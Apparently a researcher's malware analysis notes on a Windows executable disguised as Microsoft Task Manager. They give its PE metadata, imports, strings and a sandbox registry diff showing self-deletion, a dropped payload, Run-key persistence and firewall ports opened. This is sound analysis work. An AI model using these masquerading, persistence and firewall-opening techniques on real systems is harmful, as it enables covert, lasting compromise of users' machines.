0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   50 45 00 00 4C 01 04 00 2A 26 7E 50 00 00 00 00    PE..L...*&~P....
0090   00 00 00 00 E0 00 0E 01 0B 01 02 32 00 A6 01 00    ...........2....


Bin:
//Pic:

// faking windoz app:

UninitializedDataSize....: 0
InitializedDataSize......: 23040
ImageVersion.............: 0.0
ProductName..............: Microsoft(R) Windows (R) 2000 Operating System
FileVersionNumber........: 5.0.2137.1
LanguageCode.............: English (U.S.)
FileFlagsMask............: 0x003f
FileDescription..........: Windows TaskManager
CharacterSet.............: Unicode
LinkerVersion............: 2.5
FileOS...................: Windows NT 32-bit
MIMEType.................: application/octet-stream
Subsystem................: Windows GUI
FileVersion..............: 5.00.2137.1
TimeStamp................: 2012:10:17 04:29:46+01:00
FileType.................: Win32 EXE
PEType...................: PE32
InternalName.............: taskmgr
ProductVersion...........: 5.00.2137.1
SubsystemVersion.........: 4.0
OSVersion................: 4.0
OriginalFilename.........: taskmgr.exe
LegalCopyright...........: Copyright (C) Microsoft Corp. 1991-1999
MachineType..............: Intel 386 or later, and compatibles
CompanyName..............: Microsoft Corporation
CodeSize.................: 108032
FileSubtype..............: 0
ProductVersionNumber.....: 5.0.2137.1
EntryPoint...............: 0x1ef0
ObjectFileType...........: Executable application

//Sigcheck

publisher................: Microsoft Corporation
product..................: Microsoft(R) Windows (R) 2000 Operating System
internal name............: taskmgr
copyright................: Copyright (C) Microsoft Corp. 1991-1999
original name............: taskmgr.exe
file version.............: 5.00.2137.1
description..............: Windows TaskManager


.text                  4096        107728    108032     7.49  7bb7c23fbff31a0f4dc8c2082f47d453
.data                114688         13048     12800     1.62  bfd92f96b4b275e9bdc8941a0ac85831
.rsrc                131072          8368      8704     3.36  210a8ec34d58b64a2531c59aa8344586
.reloc               143360           516      1024     3.94  1841b4a61bd8a2498e642d7a36c6d596

Compiled by: Borland Delphi 3.0
Compile Time: 2012-10-17 12:29:46
Packed entropy: Entropy 7.48782313568
Name:                          .text
Misc:                          0x1A4D0
Misc_PhysicalAddress:          0x1A4D0
Misc_VirtualSize:              0x1A4D0
VirtualAddress:                0x1000
SizeOfRawData:                 0x1A600
PointerToRawData:              0x400
PointerToRelocations:          0x0
PointerToLinenumbers:          0x0
NumberOfRelocations:           0x0
NumberOfLinenumbers:           0x0
Characteristics:               0x60000020


  LangID: 040904B0

    LegalCopyright: Copyright (C) Microsoft Corp. 1991-1999
    InternalName: taskmgr
    FileVersion: 5.00.2137.1
    CompanyName: Microsoft Corporation
    ProductName: Microsoft(R) Windows (R) 2000 Operating System
    ProductVersion: 5.00.2137.1
    FileDescription: Windows TaskManager
    OriginalFilename: taskmgr.exe

------------------

imported calls DLL

-------------------

0041EA0C  GetCPInfo                   KERNEL32
0041EA10  VirtualAlloc                KERNEL32
0041EA14  LoadLibraryA                KERNEL32
0041EA18  GetProcAddress              KERNEL32
0041EA1C  GetWindowsDirectoryW        KERNEL32
0041EA20  lstrcatW                    KERNEL32
0041EA24  CreateFileW                 KERNEL32
0041EA2C  LoadIconA                   USER32
0041EA30  CreateIconIndirect          USER32
0041EA34  GetDlgCtrlID                USER32
0041EA38  GetScrollPos                USER32
0041EA3C  RegisterDeviceNotificationA USER32
0041EA40  DdeEnableCallback           USER32
0041EA44  DrawStateA                  USER32
0041EA48  MessageBoxIndirectW         USER32
0041EA4C  LoadMenuA                   USER32
0041EA50  GetTabbedTextExtentA        USER32
0041EA54  UnpackDDElParam             USER32
0041EA58  DialogBoxIndirectParamW     USER32
0041EA5C  ToAsciiEx                   USER32
0041EA60  IsWindow                    USER32
0041EA64  LoadKeyboardLayoutA         USER32
0041EA68  GetCursor                   USER32
0041EA6C  UserHandleGrantAccess       USER32
0041EA70  GetMenuState                USER32
0041EA74  SetMenuItemInfoA            USER32
0041EA78  TabbedTextOutW              USER32
0041EA7C  mouse_event                 USER32
0041EA80  DdeSetUserHandle            USER32
0041EA84  SetWindowWord               USER32
0041EA88  SetDlgItemTextW             USER32
0041EA8C  IsMenu                      USER32
0041EA90  SetWindowTextW              USER32
0041EA94  GetSystemMenu               USER32
0041EA98  RegisterClassA              USER32
0041EA9C  ChangeDisplaySettingsExW    USER32
0041EAA0  SetMenuInfo                 USER32
0041EAA4  GetKeyState                 USER32
0041EAA8  ChildWindowFromPoint        USER32
0041EAAC  LoadCursorFromFileW         USER32
0041EAB0  SendMessageCallbackA        USER32
0041EAB4  DdeKeepStringHandle         USER32
0041EAB8  FlashWindow                 USER32
0041EABC  OpenIcon                    USER32
0041EAC0  CreateMenu                  USER32
0041EAC4  FindWindowW                 USER32
0041EAC8  GetIconInfo                 USER32
0041EACC  GetWindowInfo               USER32
0041EAD0  IsCharAlphaNumericA         USER32
0041EAD4  FrameRect                   USER32
0041EAD8  FlashWindowEx               USER32
0041EADC  SetSysColors                USER32
0041EAE0  GetCapture                  USER32
0041EAE4  DdeGetLastError             USER32
0041EAE8  SetWindowsHookA             USER32
0041EAEC  PostThreadMessageA          USER32
0041EAF0  TranslateMessage            USER32
0041EAF4  GetDlgItemTextA             USER32
0041EAF8  GetShellWindow              USER32
0041EAFC  CreateAcceleratorTableW     USER32
0041EB00  DrawMenuBar                 USER32
0041EB04  DdeDisconnect               USER32
0041EB08  SetClipboardData            USER32
0041EB0C  CreateDialogParamW          USER32
0041EB10  ToUnicodeEx                 USER32
0041EB14  CreatePopupMenu             USER32
0041EB18  IMPQueryIMEA                USER32
0041EB1C  CloseWindowStation          USER32
0041EB20  GetGuiResources             USER32
0041EB24  GetPropW                    USER32
0041EB28  SetActiveWindow             USER32
0041EB2C  CharNextExA                 USER32
0041EB30  IsRectEmpty                 USER32
0041EB34  LockSetForegroundWindow     USER32
0041EB38  SetScrollRange              USER32
0041EB3C  EnumPropsExW                USER32
0041EB40  PostMessageA                USER32
0041EB44  GetClassInfoExW             USER32
0041EB48  UpdateWindow                USER32
0041EB4C  GetFocus                    USER32
0041EB50  GetWindow                   USER32
0041EB54  PaintDesktop                USER32
0041EB58  GetKeyboardLayout           USER32
0041EB5C  ChangeMenuA                 USER32
0041EB60  GetThreadDesktop            USER32
0041EB64  CharLowerBuffW              USER32
0041EB6C  RegOpenKeyExW               ADVAPI32


--------------

stringzzz

--------------
.text:004157E4 00000013 C 3「H4j.JYb-菫ﾂ\n驟ﾍ
.data:0041C02C 0000000C C CreateFileW
.data:0041C038 00000009 C kernel32
.data:0041EB76 0000000A C GetCPInfo
.data:0041EB82 0000000D C VirtualAlloc
.data:0041EB92 0000000D C LoadLibraryA
.data:0041EBA2 0000000F C GetProcAddress
.data:0041EBB4 00000015 C GetWindowsDirectoryW
.data:0041EBCC 00000009 C lstrcatW
.data:0041EBD8 0000000C C CreateFileW
.data:0041EBE4 0000000D C KERNEL32.dll
.data:0041EBF4 0000000A C LoadIconA
.data:0041EC00 00000013 C CreateIconIndirect
.data:0041EC16 0000000D C GetDlgCtrlID
.data:0041EC26 0000000D C GetScrollPos
.data:0041EC36 0000001C C RegisterDeviceNotificationA
.data:0041EC54 00000012 C DdeEnableCallback
.data:0041EC68 0000000B C DrawStateA
.data:0041EC76 00000014 C MessageBoxIndirectW
.data:0041EC8C 0000000A C LoadMenuA
.data:0041EC98 00000015 C GetTabbedTextExtentA
.data:0041ECB0 00000010 C UnpackDDElParam
.data:0041ECC2 00000018 C DialogBoxIndirectParamW
.data:0041ECDC 0000000A C ToAsciiEx
.data:0041ECE8 00000009 C IsWindow
.data:0041ECF4 00000014 C LoadKeyboardLayoutA
.data:0041ED0A 0000000A C GetCursor
.data:0041ED16 00000016 C UserHandleGrantAccess
.data:0041ED2E 0000000D C GetMenuState
.data:0041ED3E 00000011 C SetMenuItemInfoA
.data:0041ED52 0000000F C TabbedTextOutW
.data:0041ED64 0000000C C mouse_event
.data:0041ED72 00000011 C DdeSetUserHandle
.data:0041ED86 0000000E C SetWindowWord
.data:0041ED96 00000010 C SetDlgItemTextW
.data:0041EDA8 00000007 C IsMenu
.data:0041EDB2 0000000F C SetWindowTextW
.data:0041EDC4 0000000E C GetSystemMenu
.data:0041EDD4 0000000F C RegisterClassA
.data:0041EDE6 00000019 C ChangeDisplaySettingsExW
.data:0041EE02 0000000C C SetMenuInfo
.data:0041EE10 0000000C C GetKeyState
.data:0041EE1E 00000015 C ChildWindowFromPoint
.data:0041EE36 00000014 C LoadCursorFromFileW
.data:0041EE4C 00000015 C SendMessageCallbackA
.data:0041EE64 00000014 C DdeKeepStringHandle
.data:0041EE7A 0000000C C FlashWindow
.data:0041EE88 00000009 C OpenIcon
.data:0041EE94 0000000B C CreateMenu
.data:0041EEA2 0000000C C FindWindowW
.data:0041EEB0 0000000C C GetIconInfo
.data:0041EEBE 0000000E C GetWindowInfo
.data:0041EECE 00000014 C IsCharAlphaNumericA
.data:0041EEE4 0000000A C FrameRect
.data:0041EEF0 0000000E C FlashWindowEx
.data:0041EF00 0000000D C SetSysColors
.data:0041EF10 0000000B C GetCapture
.data:0041EF1E 00000010 C DdeGetLastError
.data:0041EF30 00000010 C SetWindowsHookA
.data:0041EF42 00000013 C PostThreadMessageA
.data:0041EF58 00000011 C TranslateMessage
.data:0041EF6C 00000010 C GetDlgItemTextA
.data:0041EF7E 0000000F C GetShellWindow
.data:0041EF90 00000018 C CreateAcceleratorTableW
.data:0041EFAA 0000000C C DrawMenuBar
.data:0041EFB8 0000000E C DdeDisconnect
.data:0041EFC8 00000011 C SetClipboardData
.data:0041EFDC 00000013 C CreateDialogParamW
.data:0041EFF2 0000000C C ToUnicodeEx
.data:0041F000 00000010 C CreatePopupMenu
.data:0041F012 0000000D C IMPQueryIMEA
.data:0041F022 00000013 C CloseWindowStation
.data:0041F038 00000010 C GetGuiResources
.data:0041F04A 00000009 C GetPropW
.data:0041F056 00000010 C SetActiveWindow
.data:0041F068 0000000C C CharNextExA
.data:0041F076 0000000C C IsRectEmpty
.data:0041F084 00000018 C LockSetForegroundWindow
.data:0041F09E 0000000F C SetScrollRange
.data:0041F0B0 0000000D C EnumPropsExW
.data:0041F0C0 0000000D C PostMessageA
.data:0041F0D0 00000010 C GetClassInfoExW
.data:0041F0E2 0000000D C UpdateWindow
.data:0041F0F2 00000009 C GetFocus
.data:0041F0FE 0000000A C GetWindow
.data:0041F10A 0000000D C PaintDesktop
.data:0041F11A 00000012 C GetKeyboardLayout
.data:0041F12E 0000000C C ChangeMenuA
.data:0041F13C 00000011 C GetThreadDesktop
.data:0041F150 0000000F C CharLowerBuffW
.data:0041F160 0000000B C USER32.dll
.data:0041F16E 0000000E C RegOpenKeyExW
.data:0041F17C 0000000D C ADVAPI32.dll
.rsrc:00420004 00000005 C *&~P
.rsrc:0042002C 00000005 C *&~P
.rsrc:004200BC 00000005 C *&~P
.rsrc:004200E4 00000005 C *&~P
.rsrc:0042010C 00000005 C *&~P
.rsrc:00420134 00000005 C *&~P
.rsrc:0042015C 00000005 C *&~P
.rsrc:00420184 00000005 C *&~P
.rsrc:004201AC 00000005 C *&~P
.rsrc:004201D4 00000005 C *&~P
.rsrc:004201FC 00000005 C *&~P
.rsrc:00420224 00000005 C *&~P
.rsrc:0042024C 00000005 C *&~P
.rsrc:00420274 00000005 C *&~P
.rsrc:0042029C 00000005 C *&~P
.rsrc:004202C4 00000005 C *&~P
.rsrc:004202EC 00000005 C *&~P
.rsrc:00420314 00000005 C *&~P
.rsrc:0042033C 00000005 C *&~P
.rsrc:004203BC 00000005 C *&~P
.rsrc:004203E4 00000005 C *&~P
.rsrc:0042040C 00000005 C *&~P
.rsrc:00420434 00000005 C *&~P
.rsrc:0042045C 00000005 C *&~P
.rsrc:00420484 00000005 C *&~P
.rsrc:004204AC 00000005 C *&~P
.rsrc:004204D4 00000005 C *&~P
.rsrc:004204FC 00000005 C *&~P
.rsrc:00420524 00000005 C *&~P
.rsrc:0042054C 00000005 C *&~P
.rsrc:00420574 00000005 C *&~P
.rsrc:0042059C 00000005 C *&~P
.rsrc:004205C4 00000005 C *&~P
.rsrc:004205EC 00000005 C *&~P
.rsrc:00420604 00000005 C *&~P
.rsrc:004207D9 0000000D C wwwwwwwwwwwwx
.rsrc:004207E9 0000000D C wwwwwwwwwwwwx
.rsrc:004207F9 0000000D C w\"wwwwwwwxwwx
.rsrc:0042080B 00000006 C wwwwp
.rsrc:00420819 00000007 C wwwwwwx
.rsrc:00420829 0000000D C wwwwwwwwwwwwx
.rsrc:0042087B 0000000A C wwwwwwwwwx
.rsrc:0042096B 0000000A C wwwwwwwwwx
.rsrc:0042098A 0000000A C \bwwwwwwwww
.rsrc:0042099C 00000009 C wwpwwwwww
.rsrc:00420AD1 0000000E C wwwwwwwwwwwwww
.rsrc:00420C11 0000000E C wwwwwwwwwwwwww
.rsrc:00420C21 0000000B C DDDDDDDDD@
.rsrc:00420C31 0000000E C DDDDDDDDDGpw\ap
.rsrc:00420C41 0000000E C DDDDDDDDDGpw\ap
.rsrc:00420C51 0000000E C DDDDDDDDDDDDDD
.rsrc:00420C61 0000000E C wwwwwwwwwwwwww
.rsrc:00420DE9 00000006 C DDDDDD
.rsrc:00420DF1 00000006 C wwwwww
.rsrc:00420ECA 00000006 C     /
.rsrc:00420ED2 00000006 C \"\"\"\"/
.rsrc:00420EDA 00000006 C     /
.rsrc:00420EE2 00000006 C \"\"\"\"/
.rsrc:00420EEA 00000006 C     /
.rsrc:00420EF2 00000006 C \"\"\"\"/
.rsrc:00420EFA 00000006 C     /
.rsrc:00420F02 00000006 C \"\"\"\"/
.rsrc:00420F0A 00000006 C     /
.rsrc:00420F12 00000006 C \"\"\"\"/
.rsrc:00420F1A 00000006 C     /
.rsrc:00420FFA 00000006 C \"\"\"\"/
.rsrc:00421002 00000006 C     /
.rsrc:0042100A 00000006 C \"\"\"\"/
.rsrc:00421012 00000006 C     /
.rsrc:0042101A 00000006 C \"\"\"\"/
.rsrc:00421022 00000006 C     /
.rsrc:0042102A 00000006 C \"\"\"\"/
.rsrc:00421032 00000006 C     /
.rsrc:0042103A 00000006 C \"\"\"\"/
.rsrc:00421042 00000006 C     /
.rsrc:0042112A 00000006 C     /
.rsrc:00421132 00000006 C \"\"\"\"/
.rsrc:0042113A 00000006 C     /
.rsrc:00421142 00000006 C \"\"\"\"/
.rsrc:0042114A 00000006 C     /
.rsrc:00421152 00000006 C \"\"\"\"/
.rsrc:0042115A 00000006 C     /
.rsrc:00421162 00000006 C \"\"\"\"/
.rsrc:0042116A 00000006 C     /
.rsrc:0042125A 00000006 C \"\"\"\"/
.rsrc:00421262 00000006 C     /
.rsrc:0042126A 00000006 C \"\"\"\"/
.rsrc:00421272 00000006 C     /
.rsrc:0042127A 00000006 C \"\"\"\"/
.rsrc:00421282 00000006 C     /
.rsrc:0042128A 00000006 C \"\"\"\"/
.rsrc:00421292 00000006 C     /
.rsrc:0042138A 00000006 C     /
.rsrc:00421392 00000006 C \"\"\"\"/
.rsrc:0042139A 00000006 C     /
.rsrc:004213A2 00000006 C \"\"\"\"/
.rsrc:004213AA 00000006 C     /
.rsrc:004213B2 00000006 C \"\"\"\"/
.rsrc:004213BA 00000006 C     /
.rsrc:004214BA 00000006 C \"\"\"\"/
.rsrc:004214C2 00000006 C     /
.rsrc:004214CA 00000006 C \"\"\"\"/
.rsrc:004214D2 00000006 C     /
.rsrc:004214DA 00000006 C \"\"\"\"/
.rsrc:004214E2 00000006 C     /
.rsrc:004215EA 00000006 C     /
.rsrc:004215F2 00000006 C \"\"\"\"/
.rsrc:004215FA 00000006 C     /
.rsrc:00421602 00000006 C \"\"\"\"/
.rsrc:0042160A 00000006 C     /
.rsrc:0042171A 00000006 C \"\"\"\"/
.rsrc:00421722 00000006 C     /
.rsrc:0042172A 00000006 C \"\"\"\"/
.rsrc:00421732 00000006 C     /
.rsrc:0042184A 00000006 C     /
.rsrc:00421852 00000006 C \"\"\"\"/
.rsrc:0042185A 00000006 C     /
.rsrc:0042197A 00000006 C \"\"\"\"/
.rsrc:00421982 00000006 C     /
.rsrc:00421AAA 00000006 C     /


=====================
behavior check:
=====================
Self deleted,
drops: 1154656.exe payload (self copied), and using CMD command to self exec
see pic. https://lh3.googleusercontent.com/-XdS_YZJvyKk/UH46i1qRPUI/AAAAAAAAGQk/H9mKzI08TLc/s541/004.jpg

REGISTRY:

----------------------------------
Keys added:26
----------------------------------
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB\WAB4
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB\WAB4\Wab File Name
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals\Process Explorer
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\WinRAR
----------------------------------
Values added:112
----------------------------------
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control\ActiveService: "PROCEXP141"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Service: "PROCEXP141"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Legacy: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Class: "LegacyDriver"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\DeviceDesc: "PROCEXP141"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
HKLM\SYSTEM\ControlSet001\Services\RemoteAccess\Performance\Error Count: 0x00000002
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\24599:UDP: "24599:UDP:*:Enabled:UDP 24599"
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\14780:TCP: "14780:TCP:*:Enabled:TCP 14780"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control\ActiveService: "PROCEXP141"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Service: "PROCEXP141"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Legacy: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Class: "LegacyDriver"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\DeviceDesc: "PROCEXP141"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
HKLM\SYSTEM\CurrentControlSet\Services\RemoteAccess\Performance\Error Count: 0x00000002
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\24599:UDP: "24599:UDP:*:Enabled:UDP 24599"
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\14780:TCP: "14780:TCP:*:Enabled:TCP 14780"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\{8050BE41-0268-42B2-900E-11DE9FEDDDF7}\Identity Ordinal: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File2: "C:\Documents and Settings\rik\デスクトップ\001.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\b: 72 00 65 00 67 00 73 00 68 00 6F 00 74 00 2E 00 65 00 78 00 65 00 00 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 72 00 69 00 6B 00 5C 00 C7 30 B9 30 AF 30 C8 30 C3 30 D7 30 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\b: "C:\Documents and Settings\rik\デスクトップ\shot001.hiv"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\c: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\b: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv\a: "C:\Documents and Settings\rik\デスクトップ\shot001.hiv"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv\MRUList: "a"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList\a: "regshot.exe"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList\MRUList: "a"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\1: 30 00 30 00 32 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 30 32 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 30 00 32 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\1: 30 00 30 00 32 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 30 32 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 30 00 32 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:Jverfunex.yax: 01 00 00 00 06 00 00 00 B0 03 DE 89 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Cebtenz Svyrf\Jverfunex\jverfunex.rkr: 01 00 00 00 06 00 00 00 40 37 10 8A 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\evx\デスクトップ\cebprkc.rkr: 01 00 00 00 06 00 00 00 C0 26 FC 92 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\evx\デスクトップ\hcqngr_synfu_cynlre.rkr: 01 00 00 00 06 00 00 00 60 3E 40 BF 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Run\{006579CE-45C4-AD42-587D-A196614C8284}: ""C:\Documents and Settings\rik\Application Data\Zeon\azys.exe""
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\rik\デスクトップ\procexp.exe: "Sysinternals Process Explorer"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\rik\デスクトップ\update_flash_player.exe: "Windows TaskManager"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\842656.exe: "Windows TaskManager"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\851468.exe: "Windows TaskManager"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\abcd.bat: "abcd"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Server ID: 0x00000003
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\Account Name: "WhoWhere インターネット ディレクトリ サービス"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Server: "ldap.whowhere.com"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP URL: "http://www.whowhere.com"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Search Return: 0x00000064
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Timeout: 0x0000003C
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Authentication: 0x00000000
